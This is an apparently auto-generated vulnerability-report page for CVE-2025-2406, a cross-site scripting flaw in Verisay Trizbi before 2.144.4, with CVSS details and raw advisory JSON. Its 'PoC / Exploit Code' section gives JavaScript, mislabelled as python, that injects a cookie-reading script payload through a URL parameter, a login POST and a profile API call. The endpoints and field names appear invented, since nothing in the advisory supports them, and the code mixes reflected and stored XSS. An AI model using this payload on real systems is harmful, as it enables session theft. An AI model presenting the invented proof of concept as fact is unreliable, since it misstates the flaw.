Security Vulnerability Report
中文
CVE-2025-2406 CVSS 7.6 HIGH

CVE-2025-2406

Published: 2025-12-25 14:15:53
Last Modified: 2026-04-15 00:35:42

Description

Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Verisay Communication and Information Technology Industry and Trade Ltd. Co. Trizbi allows Cross-Site Scripting (XSS).This issue affects Trizbi: before 2.144.4.

CVSS Details

CVSS Score
7.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L

Configurations (Affected Products)

No configuration data available.

Trizbi < 2.144.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-2406 XSS PoC for Verisay Trizbi // Target: Trizbi < 2.144.4 // Type: Reflected XSS const payload = '<script>alert(document.cookie)</script>'; const targetUrl = 'https://target-server/trizbi/endpoint'; // Method 1: GET request with URL parameter const exploitUrl = `${targetUrl}?input_field=${encodeURIComponent(payload)}`; // Method 2: POST request async function sendXSSPayload() { const response = await fetch(targetUrl, { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded', }, body: `username=${encodeURIComponent(payload)}&password=test` }); return response.text(); } // Method 3: Stored XSS via API async function storedXSSPayload() { const response = await fetch('https://target-server/trizbi/api/user/profile', { method: 'PUT', headers: { 'Content-Type': 'application/json', 'Authorization': 'Bearer <token>' }, body: JSON.stringify({ displayName: payload, email: '[email protected]' }) }); return response.json(); } console.log('XSS Payload:', payload); console.log('Exploit URL:', exploitUrl);

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-2406", "sourceIdentifier": "[email protected]", "published": "2025-12-25T14:15:52.857", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Verisay Communication and Information Technology Industry and Trade Ltd. Co. Trizbi allows Cross-Site Scripting (XSS).This issue affects Trizbi: before 2.144.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-25-0486", "source": "[email protected]"}]}}